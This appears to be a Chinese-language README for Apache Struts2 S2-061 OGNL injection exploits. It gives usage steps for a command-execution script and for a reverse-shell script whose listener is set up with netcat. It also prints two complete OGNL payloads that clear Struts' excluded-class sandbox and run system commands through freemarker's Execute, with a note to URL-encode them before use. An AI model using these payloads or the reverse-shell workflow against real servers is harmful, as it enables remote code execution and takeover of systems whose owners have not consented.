S2-061 的payload,以及对应简单的PoC/Exp




  • struts2-061-poc.py(可执行简单系统命令)

    用法:python struts2-061-poc.py http://ip:port command

    例子:python struts2-061-poc.py whoami

  • S2-061-shell.py(可反弹shell)


    1. 首先在一台机器A上监听指定端口(例如:nc -lvvp 7777)

    2. 执行脚本:python2 S2-061-shell.py target_url,其中target_url为漏洞环境地址,形式为http://ip:port

    3. 根据脚本提示输入A机器的IP及所监听的端口,即可在机器A的监听窗口获取到shell


payload-1:(from ka1n4t)


payload-2:(from Smi1e)


使用 application,就是思路的完整 POC

%{(#application.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#application.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#application.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +(#application.map2.setBean(#application.get('map').get('context')) == true).toString().substring(0,0) + (#application.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#application.map3.setBean(#application.get('map2').get('memberAccess')) == true).toString().substring(0,0) + (#application.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + (#application.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))}

使用 request,单次请求有效的完整 POC (推荐)

%{(#request.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'whoami'}))}

注意:请使用 url 对以上的 OGNL 代码编码后,再在工具上使用。



eg: %{ 'gcowsec-' + (2000 + 20).toString()}




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